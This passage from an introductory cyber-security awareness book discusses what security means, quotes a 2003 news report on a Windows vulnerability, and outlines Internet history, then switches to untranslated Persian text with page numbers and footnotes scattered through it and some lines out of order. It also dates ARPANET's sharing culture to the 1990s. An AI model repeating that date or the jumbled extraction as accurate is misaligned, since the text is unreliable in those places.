This book and whatever exists in cyberspace do not relieve you of the need to acquire newer knowledge about computers and the Internet and to raise your level of awareness and skills. Today the Internet is the gateway to the amazing world of information and knowledge, and it can make this information available to the public at very low cost. In this way information can be shared efficiently and effectively. To achieve this goal, however, we need to recognize the facilities and behaviors that may stand in its way. We are familiar with the concept of vigilance in the real world. Now we must learn how vigilance can be achieved in cyberspace (cyber vigilance). This book has been prepared and compiled to help you in this important task.
[22] Millennium Development Goals
[23] Information and Internet security is one of the three main topics that the World Summit on the Information Society worked on at its conference in Geneva (December 2003) and is due to work on again in Tunis (April 2005). This is one more reason for the fact that the role of information and communication technology in development is gradually approaching its true place.
[24] Crackers
What Is Security?
The concept of security in the real world is vital for many of us. In prehistoric times security consisted of the principles of survival, such as security against attack by other people or by animals, and the security of the food supply.
Other needs, such as security against natural disasters or disease, were generally not an issue for prehistoric humans. With the advance of civilization the scope of security widened and came to include broader dimensions such as having a place for comfort and a life free of danger, and today the concept of personal property has also been added to the definition of security.
Most of what we do in the real world involves risk, although many of our activities carry little risk. For example, when we travel with someone we do not know, or enter an unfamiliar city or country, we know that there are threats to our physical security. The threats around us become serious when we are in an unprotected place and come face to face with someone who can take advantage of our situation. If we pay enough attention to the risks around us, we will manage to find a safe place or a remedy; for example, to go along with someone who guides us to a safe place, or to take a taxi.
Some activities carry psychological or financial risks but no physical risk. When we invest (in any form: buying land or shares, or even engaging in trade or working in the market) we expect the capital to come back to us as soon as possible. As we know, some investments will be returned sooner or later, while some are not like that and some of them even lead to a loss. For example, when we form a relationship with a new person we hope that this new relationship will bring us something, although we also accept the risk that the relationship may not bring the expected benefit.
In some areas it is not possible to achieve the level of security we expect. For example, we always wish for a long life and a healthy body, but the statistical average of life expectancy shows that this does not hold true for many people. Some of us die young, some struggle with various illnesses during their lives, and some live for many years and spend a lifetime in good health. We compensate for our inability to determine our fate with insurance, so that it protects us against adverse financial effects, accidents and illness.
This introduction sets a truth about security before us: absolute security, whether in real life or in cyberspace, is impossible and unattainable; nevertheless, security that is sufficiently adequate is achievable in almost all environments.
There are various ways of putting in place mechanisms that reinforce the increase and maintenance of security. We have physical mechanisms to guarantee our security: tall, solid buildings and strong, impenetrable doors, together with countless locks and keys. We can also rely on other physical boundaries such as walls and other separating barriers. We can also direct enough light onto the areas through which intrusion is likely. Finally, if necessary, and on the assumption that the initial intrusion attempts succeed, alarm systems and stronger guards can be used to identify and counter those who have managed to get in. Most important of all, we can also call for help on the support of public and criminal law and on the police.
We usually use several different methods to increase our security so that, if one of the measures proves ineffective, another fills the gap. If one of the keys is stolen and the door lock is from then on no longer a reliable safeguard, warning signals can be used to announce the danger of intrusion. Of course, the number of boundaries and barriers depends on the value of what is being protected and on the reasonable expectations that exist of an attack on it.
All of these protective measures and methods appear in cyberspace in another form, and we are not as familiar with their nature in cyberspace as we are with physical security measures, but we need to understand them and, if we need to provide security in cyberspace, to know how to apply them. Both in the real world and in cyberspace we need to protect and defend our assets against the attacks of others and, if the attacks succeed, to recover the assets that have been lost.
The definitions and explanations given for the word security in dictionaries and glossaries refer to matters related to well-being, such as "the quality or state of being assured, freedom from danger and freedom from fear or anxiety". None of these definitions, however, can be used to describe security in cyberspace accurately.
Instead we propose the following definition: you are secure in cyberspace when access to your information resources is under your own control, that is, when no one is able to access these information resources without obtaining permission from you. These resources include data and computing, network, transaction, processing and information resources. Naturally, some of these resources may be provided by others for your use, such as a user account[25] on a shared computer or access to the Internet through an Internet service provider (ISP).[26] Because these are never completely secure, you can keep control over continued access to and proper use of the services only as long as you follow the service provider's instructions for using them correctly.
An example of the nature of cyber security is given here. For this purpose we look at the most recent flaw that (up to the publication of this book) has been found in the kernel of the Microsoft Windows operating system:
"Microsoft has discovered a very important vulnerability[27] in almost all existing versions of its Windows operating systems, the first effect of which can be the complete failure of Microsoft Windows Server 2003. Microsoft has said that this vulnerability can enable intruders to take control of the Windows operating system of their victims' computers over the Internet, steal their information, delete files or transfer them by electronic mail. The company assured its customers that it would immediately place a free patch[28] for fixing this flaw on the Microsoft website ...."
"This flaw, which was discovered by researchers from Poland, also affected the versions of Windows that are common among home users: 'This is one of the worst Windows vulnerabilities there has ever been,' said Marc Maiffret,[29] executive director of eEye Digital Security,[30] located in Aliso Viejo[31] in the state of California, whose researchers have discovered similarly dangerous vulnerabilities in the three previous versions of Windows. Of the affected companies Maiffret said: 'Until they install this software patch their systems will be like a piece of Swiss cheese, and anyone can easily get into their servers.'
But at the same time four Polish researchers, known as the 'Last Stage of Delirium Research Group', have found that they know a way to get past Microsoft's new patches, and this was when only three months had passed since those patches were released. Although the Polish researchers designed a tool to prove the existence of the more serious vulnerabilities and used it to break into several computers, they pledged to leave no trace of these new vulnerabilities on the Internet. Some experts expected intruders to use this new flaw to break into computers within the next few months. Even without an announcement of this matter by those researchers, intruders are typically able to get past Microsoft's patches."[32]
Like the users and employees inside an organization, we have no control over the code of programs such as Windows. We know that it is very important to software vendors that their programs are secure and free of any errors, but when such problems arise we can, by taking appropriate measures and decisions, obtain and install the vendors' corrected versions, and this is the only countermeasure available to us.
[25] User Account
[26] Internet Service Provider
[27] Vulnerability
[28] Patch
[29] Marc Maiffret
[30] eEye Digital Security Inc
[31] Aliso Viejo
[32] Ted Bridis, Associated Press, July 16, 2003.
In the real world we know how we should protect our information resources, and we also know that some information must be kept confidential while some of it can be passed on freely. For this purpose we lock the doors of offices and filing cabinets, and we may even keep copies of important information away from the office so that it is protected in events such as a fire or other natural disasters. Some information can be passed on only to a limited number of people, and depending on how important the information is, different people can be trusted at different levels.
Conceptually there is no difference between the nature of the threats in cyberspace and the threats that exist in the real world; rather, the difference between the two arises from the characteristics of the electronic space and of the threats in this domain, which make it possible to prevent them from occurring and to neutralize them, or to identify and remove them.
The topics of privacy[33] and confidentiality[34] are related to the question of security. Information that is regarded as "private" can truly remain private only if it is stored securely. For this purpose, in the real world we behave as though such information did not exist. This policy is called security by obscurity.[35] In the same way, information that has to be shared confidentially must remain secure for those who have shared it. If these people are not always in the same place, adequate security policies must be applied to this information when it is transferred.
Situations of this kind also exist in cyberspace, but given the particular nature of cyberspace and the connections between the computers in it, security by obscurity, or the use of concealment, appears to be a weak policy and should be avoided. This book provides details, at various levels, of the security measures needed in cyberspace.
[33] Privacy
[34] Confidentiality
[35] Security By Obscurity
The Emergence and Growth of the Internet
The computing and network environment of today's Internet was originally created for the purposes of research and education. When the ARPANET (the early Internet) was first created, its main goal was to share the resources of numerous groups of researchers in different geographical locations. These groups had the same goals and worked with the aim of sharing resources and data; access to the network was limited to the members of these groups, and so at that time there was little concern about securing information. The design of the World Wide Web took shape on the same basis, so as to be a powerful tool for discovering information resources and making them available to other people, without using any mechanism for obtaining authorization or for facilitating financial investments.
The culture of sharing information among researchers and academics was introduced during the 90s by the ARPANET, and signs of it can still be seen. On the basis of this culture, information on the World Wide Web is as accessible and as free as possible, and hundreds of millions of people throughout the world are able to use it. This is very important, and it is an answer to the question of why the Internet has reached its present level of growth. The ethical side of this culture can be seen in the everyday conversation of people who describe the Internet as a very good and reliable source, because they have seen the media power of the Internet and the effects of working with it. It is sometimes said of the nature of the Internet that "information in it wants to be free".
‫ﻳﻚ ﺗﻮﺟﻴﻪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻥ‬
‫ﺍﺳﺖ ﻛﻪ ﻧﺴﻞ ﺍﻭﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻋﺘﻤﺎﺩ ﻣﺘﻘﺎﺑﻞ ﺍﻳﺠﺎﺩ ﺷﺪﻩ‬
‫ﺑﻮﺩ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﺷﻜﺎﺭﺍ ﺑﺮﺍﻱ ﻛـﺎﺭ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ ﻫـﻢ ﺍﻋﺘﻤـﺎﺩ‬
‫ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺑﺎ ﮔﺴﺘﺮﺵ ﻭﺳﻴﻊ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑـﻪ ﻋـﻀﻮﻳﺖ ﺩﺭﺁﻣـﺪﻥ‬
‫ﺍﻓﺮﺍﺩ ﺑﻴﺸﺘﺮ ﺑﺎ ﻋﻼﻳﻖ ﻭ ﺍﻫﺪﺍﻑ ﻣﺨﺘﻠﻒ ﺩﺭ ﺁﻥ‪ ،‬ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ‬
‫ﻣﻌﻨﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻳﻜـﻲ ﺍﺯ ﻣﺒﺎﺣـﺚ‬
‫ﻋﻤﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻌﺔ ﻣﻔﻬـﻮﻡ ﻧـﻮﻳﻦ ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ ﺍﺳـﺖ‬
‫‪٣٥‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻗﺒـﻞ ﺍﺯ ﺧـﻮﺩ ﭼﻨـﺪﻳﻦ ﺗﻔـﺎﻭﺕ‬
‫ﺍﺳﺎﺳﻲ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺑﻌـﻀﻲ‬
‫ﺍﺯ ﺍﻳﻦ ﺗﻔﺎﻭﺗﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑـﺎ ﺷـﺒﻜﺔ ﺗﻠﻔـﻦ ﻋﻤـﻮﻣﻲ‬
‫ﺳﻮﺋﻴﭻ ﺷﺪﻩ )‪ ٣٦(PSTN‬ﻛـﻪ ﺭﻭﺯﺍﻧـﻪ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﺷﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﻢ ﺑﻬﺘﺮ ﺩﺭﻙ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﺳﺎﺱ ﻣﺪﻟﻲ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻛـﺎﺭ ﻣـﻲ ﻛﻨـﺪ ﻛـﻪ‬
‫‪ Packet Switching‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻋﺒﻮﺭ ﻣﻲ ﻛﻨﺪ ﺑـﻪ ﭼﻨـﺪﻳﻦ ﺑـﺴﺘﺔ ﺩﺍﺩﻩ ﺷﻜـﺴﺘﻪ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺷـﺪﻩ ﻭ ﻫـﺮ ﻛـﺪﺍﻡ ﺑـﺼﻮﺭﺕ‬
‫ﻣﺴﺘﻘﻞ ﺩﺭ ﺷﺒﻜﻪ ﺍﺭﺳﺎﻝ ﻭ ﭘﺲ ﺍﺯ ﺩﺭﻳﺎﻓـﺖ ﺩﺭ ﻣﻘـﺼﺪ ﻣﺠـﺪﺩﹰﺍ‬
‫ﺳﺮﻫﻢﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ )ﻣﺴﻴﺮ ﺍﺭﺳﺎﻝ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ(‪ .‬ﺍﻳـﻦ‬
‫ﺭﻭﺵ ﺍﻧﺘﻘـﺎﻝ ﺩﺭ ﻧﻘﻄـﺔ ﻣﻘﺎﺑـﻞ ‪ - Circuit Switching‬ﻛـﻪ‬
‫‪ PSTN‬ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ‪ -‬ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺑـﻪ‬
‫ﻫﺮ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻳﻚ ﻣﺪﺍﺭ ﻭﺍﺣﺪ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﻟـﺬﺍ‬
‫ﺩﺭ ﺁﻥ ﺣﺠﻢ ﺻﺪﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻳﺎﻓﺘﻪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﻣﻬﻢ ﻧﻴﺴﺖ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺭﺳﺎﻧﻪﺍﻱ ﻧﺎﺩﺍﻥ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽﻪ ﻛـﻪ ﻣـﻲﺩﺍﻧـﺪ‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻳﻚ ﺑﺴﺘﻪ ﺭﺍ ﺍﺯ ﻳﻚ ﻣﺒﺪﺃ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﻪ‬
‫‪٣٧‬‬
‫ﻳﻚ ﻣﻘﺼﺪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﺮﺳﺎﻧﺪ‪ .‬ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﺩﺭ ﺍﻧﺘﻬﺎ ﻭ ﺩﺭ ﻟﺒﻪﻫﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻋﻮﺽ ﺩﺭ ‪ PSTN‬ﺍﺳﺎﺱ ﻛﺎﺭ ﺷـﺒﻜﻪ "ﻫﻮﺷـﻤﻨﺪﻱ"‬
‫ﺍﺳﺖ ﻭ ﺍﺑـﺰﺍﺭ ﻛـﺎﺭﺑﺮ ﺩﺭ ﻧﻘـﺎﻁ ﺍﻧﺘﻬـﺎﻳﻲ ﻛـﺎﺭﺑﺮﺩ ﺍﻧـﺪﻛﻲ ﺑـﺮﺍﻱ‬
‫ﺻﺤﺒﺖﻛﺮﺩﻥ ﻳﺎ ﮔﻮﺵﺩﺍﺩﻥ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﺍﺳﺖ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺮﺯﻫـﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ‬
‫ﺑﻪ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻭﻳﮋﮔـﻲ ﺑـﺎﺭﺯﺗﺮﻳﻦ ﻭ‬
‫ﺟﺎﻟﺒﺘﺮﻳﻦ ﺧﺼﻮﺻﻴﺖ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﺍﻟﺒﺘـﻪ ﺍﺭﺗﺒـﺎﻁ ﭼﻨـﺪﺍﻧﻲ ﺑـﻪ‬
‫ﺍﻣﻨﻴﺖ ﻧﺪﺍﺭﺩ‪ .‬ﺷﺒﻜﺔ ‪ PSTN‬ﻧﻴﺰ ﺟﻬﺎﻧﻲ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺗﻠﻔﻨﻲ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﻼ ﻛﺎﺭﺑﺮ ﺗﻠﻔﻦ ﻣﻲﺩﺍﻧﺪ ﻛﻪ ﺑـﺎ ﻳـﻚ ﻛـﺸﻮﺭ ﺧـﺎﺭﺟﻲ‬
‫ﻧﻴﺴﺖ ﻭ ﻣﺜ ﹰ‬
‫ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﺍﺳﺖ؛ ﺍﻣﺎ ﻭﻗﺘﻴﻜﻪ ﺑﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺳﺘﺮﺳـﻲ‬
‫ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻟﺰﻭﻣـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺪﺍﻧـﺪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺁﻥ ﺩﺭ‬
‫ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪.‬‬
‫‪Public Switched Telephone Network‬‬
‫‪Internet Services‬‬
‫‪36‬‬
‫‪37‬‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﻏﻴﺮﻣﺘﻤﺮﻛــﺰ ﺍﺳــﺖ ﻭ ﺩﺭ ﺁﻥ ﻫــﻴﭻ ﺳﻴــﺴﺘﻢ ﻣﺮﻛــﺰﻱ‬
‫ﺍﺭﺗﺒﺎﻃﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﻫﻤﻴﻨﻜﻪ ﺷـﻤﺎ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺍﺻـﻠﻲ ﺁﻥ‬
‫ﻧﻈﻴﺮ ‪ TCP/IP‬ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷـﺒﻜﻪ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻫﻤﻪﺟـﺎ ﺭﺍﻳـﺞ ﺍﺳـﺖ ﻭ ﻣﻮﺍﻧـﻊ ﻭﺭﻭﺩ ﺑـﻪ ﺁﻥ ﺍﻧـﺪﻙ‬
‫‪٤٠‬‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﻣﻘﺪﺍﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ )ﺳﺮﻋﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑـﺎ ﺁﻥ‬
‫ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴـﺪ( ﻧﻴﺰ ﺑﻪ ﻇﺮﻓﻴﺖ ﺣﻤـﻞ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ‪ ،‬ﺍﺗـﺼﺎﻻﺕ‬
‫ﻓﻴﺒﺮﻱ ﻳﺎ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﻭﺍﻗﻊ ﺩﺭ ﻣـﺴﻴﺮ ﺍﻧﺘﻘـﺎﻝ ﺑـﺴﺘﮕﻲ‬
‫ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺷﺎﻫﺮﺍﻩ ﺁﻥ ﻃﻴﻔﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛﻤﻴـﺎﺏ ﻭﺟـﻮﺩ‬
‫ﻧﺪﺍﺭﻧﺪ‪ .‬ﻫﺮﺟﺎ ﻛـﻪ ﺍﺯ ﻃﻴـﻒ ﺭﺍﺩﻳـﻮﻳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﮔـﺮﺩﺩ ‪ -‬ﻣﺎﻧﻨـﺪ‬
‫ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ )‪ ٤١(WLANs‬ﻛﻪ ﻣﻌﻤـﻮ ﹰ‬
‫‪ Wi-Fi‬ﺍﺯ ﺁﻧﻬﺎ ﻧﺎﻡ ﺑﺮﺩﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺮﺗﺒﻂ‬
‫ﻳﻚ ﻣﺤﻴﻂ ﺍﺷﺘﺮﺍﻛﻲ ﺭﺍ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ ﻛـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺳـﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻮﺳﻂ ﻭﺍﻗﻊ ﺩﺭ ﺑﺨـﺸﻬﺎﻳﻲ ﺍﺯ ﺩﻧﻴـﺎ ﻛـﻪ‬
‫ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﻣﺤﻠﻲ ﺩﺭ ﺁﻧﻬﺎ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻧـﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺗﻤـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﻗﻴﻤﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔـﻦ ﻭ‬
‫ﻛﺎﻓﻲﻧﺖ ﻭ ﺩﻳﮕﺮ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺑﺴﻴﺎﺭ‬
‫ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺩﺭﺻـﺪ‬
‫ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺮﺩﻡ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻧﻊ ﻣﻮﺟﻮﺩ ﻣﻴﺎﻥ ﻣﺆﻟﻒ ﻭ ﻧﺎﺷﺮ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻩ ﺍﺳـﺖ؛‬
‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺎﺷـﺮ ﺑﺎﺷـﻴﺪ ﻭ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺧـﺪﻣﺎﺕ‬
‫ﺷﺒﻜﻪﺍﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﻛﺎﻓﻴـﺴﺖ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ‬
‫ﻫﻤﻮﺍﺭﻩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭﺑـﺎﺭﺓ‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴـﺪ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﻛﻨﻴـﺪ ﻭ ﻫـﺮ ﻛـﺲ‬
‫ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺩﺭﺻﻮﺭﺕ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ‬
‫‪Transmission Control Protocol/Internet‬‬
‫‪Protocol‬‬
‫‪Internet Engineering Task Force‬‬
‫‪Bandwidth‬‬
‫‪Wireless Local Area Networks‬‬
‫‪38‬‬
‫‪39‬‬
‫‪40‬‬
‫‪41‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻣﺆﺛﺮ‪ ،‬ﻭﺍﻗﻊ ﮔﺮﺍﻳﺎﻧﻪ‪ ،‬ﻭ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑـﻞ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ ﻛﻪ ﻫﺮ ﺷﺒﻜﻪﺍﻱ ﻛـﻪ ﺑـﻪ ﺧـﺎﻧﻮﺍﺩﻩﺍﻱ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ‬
‫‪ ٣٨TCP/IP‬ﺗﻌﻠﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﻥ ﻣﺘـﺼﻞ ﺷـﻮﺩ ﻭ‬
‫ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﻣﺤﺴﻮﺏ ﮔﺮﺩﺩ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺍﻳـﻦ‬
‫ﭘﺮﻭﺗﻜﻠﻬﺎ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﻨﺪ ﺗﻮﺳﻂ ‪ ٣٩IETF‬ﺍﺭﺍﺋﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ‬
‫ﻻ ﺑﺪﻧﺔ ﻓﻨﻲ ﻏﻴﺮﺭﺳﻤﻲ ﺁﻧﻬﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﺷﺎﻳـﺴﺘﻪﺳـﺎﻻﺭﻱ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻓﻨﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻮﺍﻓﻘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫‪٣٦‬‬
‫ﺟﺎﻧﺐ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺻﻞ ﺷﺪﻩ ﻭ ﺍﺯ ﺁﻥ ﺧـﺪﻣﺎﺕ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻂ ﻛـﺎﺭﺑﺮﺍﻥ ﻗﺎﺑـﻞ ﻛﻨﺘـﺮﻝ ﻭ ﺷـﻨﻮﺩ‬
